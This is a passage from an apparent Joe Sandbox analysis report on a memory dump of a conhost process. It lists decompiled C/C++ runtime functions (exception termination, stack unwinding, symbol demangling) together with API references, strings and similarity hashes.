				goto 0x7eed6e5d;
				return 3;
			}

0x7ff67eed6dab
0x7ff67eed6db3
0x7ff67eed6dbf
0x7ff67eed6dd6
0x7ff67eed6ddb
0x7ff67eed6ddf
0x7ff67eed6de8
0x7ff67eed6dec
0x7ff67eed6e01
0x7ff67eed6e06
0x7ff67eed6e11
0x7ff67eed6e49
0x7ff67eed6e53
0x7ff67eed6e70

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 7fff73bbf9cd7442e5474ed1ff5c5bcb4916f1876caa3108bba65620fef352c2
Instruction ID: 35f86a66abf220180c97c0f9aa0ecda445bd9eb98d9ccfefea00b1ef702d91ab
Opcode Fuzzy Hash: 7fff73bbf9cd7442e5474ed1ff5c5bcb4916f1876caa3108bba65620fef352c2
Instruction Fuzzy Hash: DAF1C97BA2DAC245EB60CB11D4003BEA7A1EBE5794F544835FE8D87795DEBCE4488700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EEC71A0 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 168cb63ac5582e180361d27d00765e4b1fd2d900803c036edfebeedf4a2c12df
Instruction ID: 7d643c77b98c11c4ee60a40dfd638681db370b2e4d451bb9f3f11fec595a2c49
Opcode Fuzzy Hash: 168cb63ac5582e180361d27d00765e4b1fd2d900803c036edfebeedf4a2c12df
Instruction Fuzzy Hash: D8910963B2C28641F7684B3994453792FD29B61B80F04DA31EE4D837E5DEBDE99A8340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EEC3F50 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d3a6bd0b90a72bb3ebf491c3b8390b68c216c5f6876ae65ed73438912ba1751
Instruction ID: 7d2142ca0b1c8afaad78f81225e954d29bdb5f7251b3a90c900bb641bddae523
Opcode Fuzzy Hash: 3d3a6bd0b90a72bb3ebf491c3b8390b68c216c5f6876ae65ed73438912ba1751
Instruction Fuzzy Hash: E4E0B67AA08B84818614DB52F48105EBB64F7ED7C4B504916FECC53B19CF3CC1A08B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EECEE50 Relevance: 31.7, APIs: 21, Instructions: 232
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

malloc.MSVCRT ref: 00007FF67EECEE6B
memcpy.MSVCRT ref: 00007FF67EECEE8B
malloc.MSVCRT ref: 00007FF67EECEEA5
memset.MSVCRT ref: 00007FF67EECEECF
abort.MSVCRT ref: 00007FF67EECEEE2
CreateSemaphoreW.KERNEL32 ref: 00007FF67EECEF0B
TlsAlloc.KERNEL32 ref: 00007FF67EECEF18
GetLastError.KERNEL32 ref: 00007FF67EECEF40
abort.MSVCRT ref: 00007FF67EECEF48

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: abortmalloc$AllocCreateErrorLastSemaphorememcpymemset
String ID:
API String ID: 342303811-0
Opcode ID: fd94bf713088d647464121d01e15feb04ebd868446a6256f3f58a07b498c7727
Instruction ID: 88b6e3187b71ba42b4116aa5ee0035c25c4ebd4bd170cacd7ee1135bff034acb
Opcode Fuzzy Hash: fd94bf713088d647464121d01e15feb04ebd868446a6256f3f58a07b498c7727
Instruction Fuzzy Hash: FA91A233F29A4285FA149B25E81067927A1AF68B84F548E35FD1DC73A5DFBCE859C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EED7700 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 102
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 26%

			E00007FF67FF67EED7700(intOrPtr* __rax, void* __rbx, void* __rdx, char* __rdi, int __rsi, void* __r8) {
				char _v28;
				void* _t44;
				void* _t63;
				void* _t64;
				intOrPtr _t69;
				intOrPtr* _t71;
				long long* _t72;
				long long* _t92;
				long long _t95;
				long long* _t107;
				long long* _t122;

				_t114 = __r8;
				_t71 = __rax;
				if ( *0x7eedc160 != 0) goto 0x7eed7806;
				 *0x7eedc160 = 1;
				E00007FF67FF67EED8300(__rax);
				if (__rax == 0) goto 0x7eed77dc;
				_v28 = 0xffffffff;
				r8d = 0;
				_t77 =  *((intOrPtr*)(__rax + 8)) + __rax;
				E00007FF67FF67EECD110(__rax,  *((intOrPtr*)(__rax + 8)) + __rax, __rdx, __r8,  &_v28);
				_t107 =  *0x7eedc0d0; // 0x7ff67eed6090
				_t105 = _t71;
				 *_t107();
				r8d = 0x30;
				fwrite(__rbx, __rsi);
				if (_v28 == 0) goto 0x7eed77cd;
				 *_t107();
				fputs(__rdi);
				 *_t107();
				r8d = 2;
				fwrite(??, ??, ??, ??);
				_t69 = _v28;
				if (_t69 != 0) goto 0x7eed77c8;
				free(??);
				E00007FF67FF67EED84D0(2, _t63, _t64, _t71, _t77, _t71, _t71, _t107, _t114, _t71);
				 *_t107();
				fputs(??, ??);
				goto 0x7eed7797;
				 *0x7eedc0d0();
				r8d = 0x2d;
				fwrite(??, ??, ??, ??);
				abort();
				 *0x7eedc0d0();
				r8d = 0x1d;
				fwrite(??, ??, ??, ??);
				abort();
				if (_t69 != 0) goto 0x7eed789b;
				E00007FF67FF67EED8150(_t71, _t71);
				_t72 =  *_t71;
				 *((intOrPtr*)(_t72 + 0x10))();
				 *_t107();
				_t122 = _t72;
				r8d = 0xb;
				fwrite(??, ??, ??, ??);
				 *_t107();
				fputs(??, ??);
				 *_t107();
				fputc(??, ??);
				E00007FF67FF67EED8330(_t72);
				goto 0x7eed7801;
				E00007FF67FF67EED8150(_t72, _t72);
				E00007FF67FF67EED8330(_t72);
				_t79 = _t72;
				E00007FF67FF67EED8330(_t72);
				_t92 = _t72;
				E00007FF67FF67EECEB70();
				E00007FF67FF67EED8100(_t63, _t64, _t72, _t92);
				_t93 = _t72;
				 *_t72 = 0x7eee0a00;
				E00007FF67FF67EED8520(8, 1, _t63, _t64, 0x7eee0a00, _t79, _t72, 0x7eee05d0, _t105, _t107, 0x7ff67eed76b0, _t122);
				E00007FF67FF67EED8100(_t63, _t64, 0x7eee0a00, _t93);
				 *0x7eee0a00 = 0x7eee0a30;
				_t44 = E00007FF67FF67EED8520(8, 1, _t63, _t64, 0x7eee0a30, _t79, 0x7eee0a00, 0x7eee05f0, _t105, _t107, 0x7ff67eed76f0, _t122);
				_t95 =  *0x7eedc138; // 0x26229ce0080
				if (_t95 == 0) goto 0x7eed7940;
				0x7eed6668();
				 *0x7eedc138 = 0;
				return _t44;
			}

0x7ff67eed7700
0x7ff67eed7700
0x7ff67eed770e
0x7ff67eed7714
0x7ff67eed771b
0x7ff67eed7723
0x7ff67eed7737
0x7ff67eed7742
0x7ff67eed7747
0x7ff67eed774d
0x7ff67eed7757
0x7ff67eed775e
0x7ff67eed7761
0x7ff67eed7768
0x7ff67eed7778
0x7ff67eed7788
0x7ff67eed778a
0x7ff67eed7792
0x7ff67eed779c
0x7ff67eed779e
0x7ff67eed77b3
0x7ff67eed77bc
0x7ff67eed77be
0x7ff67eed77c3
0x7ff67eed77c8
0x7ff67eed77cd
0x7ff67eed77d5
0x7ff67eed77da
0x7ff67eed77e1
0x7ff67eed77e7
0x7ff67eed77fc
0x7ff67eed7801
0x7ff67eed780b
0x7ff67eed7811
0x7ff67eed7826
0x7ff67eed782b
0x7ff67eed7837
0x7ff67eed7839
0x7ff67eed7841
0x7ff67eed7844
0x7ff67eed784f
0x7ff67eed7851
0x7ff67eed7854
0x7ff67eed7866
0x7ff67eed7870
0x7ff67eed7878
0x7ff67eed7882
0x7ff67eed788c
0x7ff67eed7891
0x7ff67eed7896
0x7ff67eed789b
0x7ff67eed78a0
0x7ff67eed78aa
0x7ff67eed78ad
0x7ff67eed78b2
0x7ff67eed78b5
0x7ff67eed78c9
0x7ff67eed78dc
0x7ff67eed78e6
0x7ff67eed78e9
0x7ff67eed78f9
0x7ff67eed7916
0x7ff67eed7919
0x7ff67eed7924
0x7ff67eed792e
0x7ff67eed7930
0x7ff67eed7935
0x7ff67eed7944

APIs

fwrite.MSVCRT ref: 00007FF67EED77FC

Part of subcall function 00007FF67EECD110: strlen.MSVCRT ref: 00007FF67EECD195
Part of subcall function 00007FF67EECD110: memcpy.MSVCRT ref: 00007FF67EECD1AE
Part of subcall function 00007FF67EECD110: free.MSVCRT ref: 00007FF67EECD1B9

fwrite.MSVCRT ref: 00007FF67EED7778
fputs.MSVCRT ref: 00007FF67EED7792
fwrite.MSVCRT ref: 00007FF67EED77B3
free.MSVCRT ref: 00007FF67EED77C3
fputs.MSVCRT ref: 00007FF67EED77D5
abort.MSVCRT ref: 00007FF67EED7801
fwrite.MSVCRT ref: 00007FF67EED7826
abort.MSVCRT ref: 00007FF67EED782B
fwrite.MSVCRT ref: 00007FF67EED7866
fputs.MSVCRT ref: 00007FF67EED7878
fputc.MSVCRT ref: 00007FF67EED788C

Strings

terminate called without an active exception, xrefs: 00007FF67EED77F2
what(): , xrefs: 00007FF67EED785F
terminate called recursively, xrefs: 00007FF67EED781C
terminate called after throwing an instance of ', xrefs: 00007FF67EED776E

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: fwrite$fputs$abortfree$fputcmemcpystrlen
String ID: what(): $terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
API String ID: 802779101-808685626
Opcode ID: e54bead37d702d61443724edad2057ef5e6b0eabac6da5e473f5f6ccac751670
Instruction ID: 48182d8e8fddfb20c1e26a485d9310c8bc8097fac29d9dc57e9ca7db98b63c02
Opcode Fuzzy Hash: e54bead37d702d61443724edad2057ef5e6b0eabac6da5e473f5f6ccac751670
Instruction Fuzzy Hash: 4841DD6EF3951305FA10E761A8163B906519FE5BC4F204939F81ECBBC6DEADE8098301

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EECE900 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 127
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RaiseException.KERNEL32 ref: 00007FF67EECE9CE
abort.MSVCRT(?,?,?,?,?,?,00000060,?,?,?,00000000,?,00007FF67EED8585), ref: 00007FF67EECE9D4
RtlUnwindEx.KERNEL32 ref: 00007FF67EECEAED

Strings

CCG!, xrefs: 00007FF67EECE9C1
CCG!, xrefs: 00007FF67EECE92A
CCG , xrefs: 00007FF67EECE967
CCG", xrefs: 00007FF67EECE939

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: ExceptionRaiseUnwindabort
String ID: CCG $CCG!$CCG!$CCG"
API String ID: 4140830120-3707373406
Opcode ID: 8a98d36b2feb929295ac5daf29f12a373ff66b094d1554b85097155b44034e01
Instruction ID: 891671fdfb1a323039d6237fd8330c00e5ef2e3fda05edc8bda77790b65d2581
Opcode Fuzzy Hash: 8a98d36b2feb929295ac5daf29f12a373ff66b094d1554b85097155b44034e01
Instruction Fuzzy Hash: 7851BB33A28B8182E7608B15E4446B977A0F799B88F645636FE8D93768CF7CD985C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EECC2F0 Relevance: 15.3, APIs: 4, Strings: 6, Instructions: 346
stringCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E00007FF67FF67EECC2F0(signed char* __rcx, long long __rdx, long long __r8) {
				int _t92;
				void* _t98;
				signed int _t100;
				signed int _t103;
				signed int _t106;
				signed int _t115;
				signed int _t119;
				signed int _t130;
				void* _t160;
				void* _t170;
				long long _t178;
				signed char* _t185;
				signed char* _t188;
				void* _t200;
				signed char* _t205;
				void* _t208;
				long long* _t210;
				void* _t211;
				void* _t214;
				signed char* _t226;
				signed char* _t227;
				signed char* _t228;
				signed char* _t229;
				signed char* _t230;
				signed char* _t231;
				void* _t234;
				signed long long _t235;
				void* _t240;

				_t210 = _t211 - 0x228 + 0x80;
				_t188 = __rcx;
				 *((long long*)(_t210 + 0x200)) = __r8;
				if ( *((char*)(__rcx)) == 0x5f) goto 0x7eecc718;
				r8d = 8;
				r13d = 0;
				if (strncmp(??, ??, ??) == 0) goto 0x7eecc696;
				r11d = 0;
				 *((intOrPtr*)(_t210 + 0x14)) = 1;
				 *((long long*)(_t210 - 0x60)) = __rcx + 1;
				_t6 = _t210 - 0x40; // -63
				_t178 = _t6;
				r11b = r13d != 2;
				_t7 = _t234 - 2; // -4
				r11d = r11d + 0x45;
				 *((long long*)(_t210 - 0x48)) = _t178;
				 *((long long*)(_t210 + 0x1f8)) = __rdx;
				 *(_t210 - 0x54) = r11d;
				goto 0x7eecc43b;
				if (_t7 - 1 > 0) goto 0x7eecc650;
				_t231 = __rcx + 0xb;
				 *(_t210 - 0x28) = _t231;
				if ( *((char*)(__rcx + 0xb)) != 0x5f) goto 0x7eecc3a1;
				if ( *((char*)(__rcx + 0xc)) == 0x5a) goto 0x7eecc668;
				 *((long long*)(_t210 - 0x50)) = __r8;
				_t92 = strlen(??);
				if (r15d == 0) goto 0x7eecc70c;
				 *((long long*)(4 + _t235 * 8)) = 0;
				 *((intOrPtr*)(_t210 - 0x18)) = 1;
				if (_t92 <= 0) goto 0x7eecc70c;
				 *(_t235 * 8) = 0;
				 *(0x10 + _t235 * 8) = _t231;
				 *(0x18 + _t235 * 8) = _t92;
				_t130 =  *(_t210 - 0x54);
				r9d = 0;
				E00007FF67FF67EEC4150(_t130, _t178,  *((intOrPtr*)(_t210 - 0x48)),  *((intOrPtr*)(_t210 - 0x50)));
				strlen(??);
				_t226 =  &(_t231[_t178]);
				 *(_t210 - 0x28) = _t226;
				if (_t178 == 0) goto 0x7eecc427;
				if (( *_t226 & 0x000000ff) == 0) goto 0x7eecc74a;
				if ( *((intOrPtr*)(_t210 + 0x14)) != 0xffffffff) goto 0x7eecc743;
				 *((intOrPtr*)(_t210 + 0x14)) = 0;
				strlen(??);
				asm("dec ax");
				 *(_t210 - 0x28) = __rcx;
				 *(_t210 - 0x30) = 0x11;
				r15d = _t178 + _t178;
				 *((intOrPtr*)(_t210 - 0x18)) = 0;
				 *((intOrPtr*)(_t210 - 0x14)) = r15d;
				asm("dec ax");
				 *(_t210 - 4) = _t130;
				asm("punpcklqdq xmm0, xmm1");
				 *((intOrPtr*)(_t210 - 8)) = 0;
				asm("movaps [ebp-0x40], xmm0");
				 *_t210 = 0;
				 *((long long*)(_t210 + 8)) = 0;
				 *((intOrPtr*)(_t210 + 0x10)) = 0;
				 *((intOrPtr*)(_t210 + 0x18)) = 0;
				if (r15d - 0x800 > 0) goto 0x7eecc72d;
				_t98 = E00007FF67FF67EECE3E0(r15d);
				_t214 = _t208 - (__rcx + _t178 << 5);
				E00007FF67FF67EECE3E0(_t98);
				 *(_t210 - 0x20) = _t214 + 0x00000027 & 0xfffffff8;
				 *((long long*)(_t210 - 0x10)) = _t214 - (0x0000000f + _t130 * 0x00000008 & 0xfffffff0) + 0x20;
				if (r13d != 1) goto 0x7eecc380;
				if ( *((char*)(__rcx)) != 0x5f) goto 0x7eecc427;
				 *(_t210 - 0x28) =  *((intOrPtr*)(_t210 - 0x60));
				if ( *((char*)(__rcx + 1)) != 0x5a) goto 0x7eecc427;
				_t185 = __rcx + 2;
				 *(_t210 - 0x28) = _t185;
				_t100 =  *(__rcx + 2) & 0x000000ff;
				_t54 = _t210 - 0x40; // -63
				if (_t100 == 0x47) goto 0x7eecc6fc;
				if (_t100 == 0x54) goto 0x7eecc6fc;
				E00007FF67FF67EEC7C10(1, _t185, _t54, _t130);
				_t205 =  *(_t210 - 0x28);
				if (( *(_t210 - 0x30) & 0x00000001) == 0) goto 0x7eecc41a;
				if (( *_t205 & 0x000000ff) != 0x2e) goto 0x7eecc41a;
				_t103 = _t205[1] & 0x000000ff;
				_t60 = _t185 - 0x61; // -7
				r8b = _t103 == 0x5f;
				if ((_t60 & 0xffffff00 | _t60 - 0x00000019 < 0x00000000) != 0) goto 0x7eecc8a4;
				if (r8b != 0) goto 0x7eecc8a4;
				if (_t103 - 0x30 - 9 > 0) goto 0x7eecc898;
				_t227 =  &(_t205[2]);
				goto 0x7eecc5a9;
				_t106 = _t227[1] & 0x000000ff;
				_t228 =  &(_t227[1]);
				r8d = _t185 - 0x30;
				_t160 = r8b - 9;
				r8b = _t160 < 0;
				if (_t160 != 0) goto 0x7eecc5a0;
				if (_t106 == 0x5f) goto 0x7eecc5a0;
				asm("o16 nop [eax+eax]");
				if (_t106 != 0x2e) goto 0x7eecc60d;
				if ((_t228[1] & 0x000000ff) - 0x30 - 9 > 0) goto 0x7eecc60d;
				_t229 =  &(_t228[2]);
				if (_t185 - 0x30 - 9 > 0) goto 0x7eecc5d0;
				_t230 =  &(_t229[1]);
				if (_t185 - 0x30 - 9 <= 0) goto 0x7eecc5f8;
				if ((_t229[1] & 0x000000ff) == 0x2e) goto 0x7eecc5d4;
				r8d = r11d;
				 *(_t210 - 0x28) = _t230;
				r8d = r8d - 1;
				E00007FF67FF67EEC4250(_t229[1] & 0x000000ff, _t54, _t205);
				E00007FF67FF67EEC4150(0x4f, _t185, _t54, _t185);
				if (( *_t230 & 0x000000ff) != 0x2e) goto 0x7eecc41a;
				goto 0x7eecc560;
				asm("o16 nop [cs:eax+eax]");
				E00007FF67FF67EEC4E60();
				goto 0x7eecc41a;
				 *(_t210 - 0x28) = _t188 + 0xd;
				_t115 =  *(_t188 + 0xd) & 0x000000ff;
				_t82 = _t210 - 0x40; // -63
				_t240 = _t82;
				if (_t115 == 0x47) goto 0x7eecc6e8;
				if (_t115 == 0x54) goto 0x7eecc6e8;
				E00007FF67FF67EEC7C10(0, _t188 + 0xd, _t240, _t230);
				goto 0x7eecc3f5;
				_t170 = ( *(_t188 + 8) & 0x000000ff) - 0x24 - 0x3b;
				if (_t170 > 0) goto 0x7eecc341;
				asm("dec eax");
				if (_t170 < 0) goto 0x7eecc341;
				_t119 =  *(_t188 + 9) & 0x000000ff;
				if (_t119 == 0x44) goto 0x7eecc6c9;
				if (_t119 != 0x49) goto 0x7eecc341;
				r13d = 0;
				if ( *((char*)(_t188 + 0xa)) != 0x5f) goto 0x7eecc341;
				r13d = 0;
				r13b = _t119 != 0x49;
				r13d = r13d + 2;
				goto 0x7eecc341;
				E00007FF67FF67EEC71A0(_t240, _t188 + 0xd, _t226);
				goto 0x7eecc3f5;
				_t200 = _t240;
				E00007FF67FF67EEC71A0(_t200, _t188 + 0xd, _t226);
				goto 0x7eecc546;
				r8d = 0;
				goto 0x7eecc3f5;
				r13d = 1;
				if ( *((char*)(_t200 + 1)) != 0x5a) goto 0x7eecc321;
				goto 0x7eecc341;
				return 0;
			}

0x7ff67eecc303
0x7ff67eecc30e
0x7ff67eecc314
0x7ff67eecc31b
0x7ff67eecc321
0x7ff67eecc32a
0x7ff67eecc33b
0x7ff67eecc345
0x7ff67eecc34c
0x7ff67eecc353
0x7ff67eecc357
0x7ff67eecc357
0x7ff67eecc35b
0x7ff67eecc35f
0x7ff67eecc363
0x7ff67eecc367
0x7ff67eecc36b
0x7ff67eecc372
0x7ff67eecc376
0x7ff67eecc383
0x7ff67eecc38d
0x7ff67eecc391
0x7ff67eecc395
0x7ff67eecc39b
0x7ff67eecc3a4
0x7ff67eecc3a8
0x7ff67eecc3b0
0x7ff67eecc3bc
0x7ff67eecc3c8
0x7ff67eecc3cf
0x7ff67eecc3d5
0x7ff67eecc3e1
0x7ff67eecc3e9
0x7ff67eecc3f5
0x7ff67eecc3f8
0x7ff67eecc3fe
0x7ff67eecc409
0x7ff67eecc40e
0x7ff67eecc412
0x7ff67eecc41d
0x7ff67eecc421
0x7ff67eecc42b
0x7ff67eecc431
0x7ff67eecc43e
0x7ff67eecc443
0x7ff67eecc448
0x7ff67eecc44f
0x7ff67eecc456
0x7ff67eecc45a
0x7ff67eecc46c
0x7ff67eecc470
0x7ff67eecc475
0x7ff67eecc478
0x7ff67eecc47c
0x7ff67eecc483
0x7ff67eecc487
0x7ff67eecc48f
0x7ff67eecc497
0x7ff67eecc49e
0x7ff67eecc4a5
0x7ff67eecc4b5
0x7ff67eecc4ba
0x7ff67eecc4dc
0x7ff67eecc4e8
0x7ff67eecc4f1
0x7ff67eecc4f5
0x7ff67eecc4fe
0x7ff67eecc50c
0x7ff67eecc510
0x7ff67eecc516
0x7ff67eecc51a
0x7ff67eecc51e
0x7ff67eecc522
0x7ff67eecc528
0x7ff67eecc530
0x7ff67eecc53e
0x7ff67eecc546
0x7ff67eecc551
0x7ff67eecc559
0x7ff67eecc560
0x7ff67eecc564
0x7ff67eecc56f
0x7ff67eecc578
0x7ff67eecc581
0x7ff67eecc589
0x7ff67eecc593
0x7ff67eecc597
0x7ff67eecc5a0
0x7ff67eecc5a5
0x7ff67eecc5ac
0x7ff67eecc5b6
0x7ff67eecc5ba
0x7ff67eecc5c1
0x7ff67eecc5c5
0x7ff67eecc5c7
0x7ff67eecc5d2
0x7ff67eecc5de
0x7ff67eecc5e9
0x7ff67eecc5f2
0x7ff67eecc5fd
0x7ff67eecc607
0x7ff67eecc60b
0x7ff67eecc60d
0x7ff67eecc613
0x7ff67eecc617
0x7ff67eecc61a
0x7ff67eecc62a
0x7ff67eecc638
0x7ff67eecc641
0x7ff67eecc646
0x7ff67eecc654
0x7ff67eecc663
0x7ff67eecc66c
0x7ff67eecc670
0x7ff67eecc674
0x7ff67eecc674
0x7ff67eecc67a
0x7ff67eecc67e
0x7ff67eecc685
0x7ff67eecc691
0x7ff67eecc69d
0x7ff67eecc69f
0x7ff67eecc6af
0x7ff67eecc6b3
0x7ff67eecc6b9
0x7ff67eecc6bf
0x7ff67eecc6c3
0x7ff67eecc6c9
0x7ff67eecc6d0
0x7ff67eecc6d6
0x7ff67eecc6db
0x7ff67eecc6df
0x7ff67eecc6e3
0x7ff67eecc6eb
0x7ff67eecc6f7
0x7ff67eecc6fc
0x7ff67eecc6ff
0x7ff67eecc707
0x7ff67eecc710
0x7ff67eecc713
0x7ff67eecc71c
0x7ff67eecc722
0x7ff67eecc728
0x7ff67eecc742

APIs

strncmp.MSVCRT ref: 00007FF67EECC334
strlen.MSVCRT ref: 00007FF67EECC43E

Strings

Z, xrefs: 00007FF67EECC508
_, xrefs: 00007FF67EECC6CC
_, xrefs: 00007FF67EECC4FB
_GLOBAL_, xrefs: 00007FF67EECC32D
Z, xrefs: 00007FF67EECC397
_, xrefs: 00007FF67EECC389

Memory Dump Source

Source File: 0000002E.00000002.673932582.00007FF67EEC1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF67EEC0000, based on PE: true

Associated: 0000002E.00000002.673912172.00007FF67EEC0000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673961351.00007FF67EEDB000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673974591.00007FF67EEDD000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE4000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.673993039.00007FF67EEE6000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 0000002E.00000002.674025341.00007FF67EEE9000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_7ff67eec0000_conhost.jbxd

Similarity

API ID: strlenstrncmp
String ID: Z$Z$_$_$_$_GLOBAL_
API String ID: 1310274236-662103887
Opcode ID: 341a851b56f729c201224d03b588f663e9a3332577ccd6120970b9c7425b354a
Instruction ID: cf5e39423d54b869d9234b331710d063136eed4391d72f499f6279bae7f5349c
Opcode Fuzzy Hash: 341a851b56f729c201224d03b588f663e9a3332577ccd6120970b9c7425b354a
Instruction Fuzzy Hash: 3EE1D273B28A8289F7208F3594043FD3FA1BB14758F445A31EA5C967A5DF7C968AD700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF67EECDB86 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E00007FF67FF67EECDB86(void* __ecx, void* __edx, long long* __rax, signed int** __rcx) {
				signed int _t4;
				void* _t24;

				 *((intOrPtr*)(__rax + 0x53909090)) =  *((intOrPtr*)(__rax + 0x53909090)) + __edx;
				_t4 =  *( *__rcx);
				if ((_t4 & 0x20ffffff) == 0x20474343) goto 0x7eecdd00;
				if (_t4 - 0xc0000091 > 0) goto 0x7eecdc13;
				if (_t4 - 0xc000008d >= 0) goto 0x7eecdc32;
				_t24 = _t4 - 0xc0000008;
